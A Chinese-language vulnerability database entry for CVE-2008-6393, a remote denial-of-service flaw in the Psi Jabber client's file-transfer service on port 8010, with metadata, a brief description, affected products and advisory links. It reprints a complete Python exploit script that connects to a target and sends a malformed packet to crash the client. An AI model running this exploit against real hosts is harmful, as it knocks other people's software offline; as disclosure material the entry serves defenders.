Psi-Im畸形报文远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117128 漏洞类型 数字错误
发布时间 2008-12-23 更新时间 2009-03-16
CVE编号 CVE-2008-6393 CNNVD-ID CNNVD-200903-052
漏洞平台 Multiple CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/7555
https://www.securityfocus.com/bid/32987
https://cxsecurity.com/issue/WLB-2009030126
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-052
|漏洞详情
Psi是用于JabberIM网络的免费即时消息客户端。Psi客户端的文件传输功能中存在堆溢出漏洞,如果远程攻击者向默认监听于8010/TCP端口的文件传输协议发送了特制报文的话,就可以触发这个溢出,导致拒绝服务的情况。
|漏洞EXP
#!/usr/bin/python
#psi jabber client 8010/tcp remote denial of service (win & lin)
#by sha0[at]badchecksum.net
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    sock.connect((sys.argv[1],8010))
except:
    print 'Cannot connect!'
    sys.exit(1)

try:
    sock.send('\x05\xff')
    print 'Crashed!'
except:
    print 'Cannot send!'

sock.close() 

# milw0rm.com [2008-12-23]
|受影响的产品
S.u.S.E. openSUSE 11.1 S.u.S.E. openSUSE 11.0 S.u.S.E. openSUSE 10.3 Psi Psi 0.12 Debian Linux 5.0 sparc Debian Linux 5.0 s/390 Debian Linux 5.0 powerpc
|参考资料

来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=658912
来源:BUGTRAQ
名称:20081223[ISecAuditorsSecurityAdvisories]PSIremoteintegeroverflowDoS
链接:http://www.securityfocus.com/archive/1/499563
来源:MLIST
名称:[oss-security]20090225CVErequest:Psi<0.12.1DoS
链接:http://www.openwall.com/lists/oss-security/2009/02/25/5
来源:MILW0RM
名称:7555
链接:http://www.milw0rm.com/exploits/7555
来源:DEBIAN
名称:DSA-1741
链接:http://www.debian.org/security/2009/dsa-1741
来源:SECUNIA
名称:34301
链接:http://secunia.com/advisories/34301
来源:SECUNIA
名称:34259
链接:http://secunia.com/advisories/34259
来源:SECUNIA
名称:33311
链接:http://secunia.com/advisories/33311
来源:SUSE
名称:SUSE-SR:2009:006
链接:http://lists.opensuse.org/opensuse-security-announce/2009-03/msg00001.html
来源:MISC
链接:http://jolmos.blogspot.com/2008/12/psi-remote-integer-overflow.html
来源:bugs.gentoo.org
链接:http://bugs.gentoo.org/show_bug.cgi?id=252830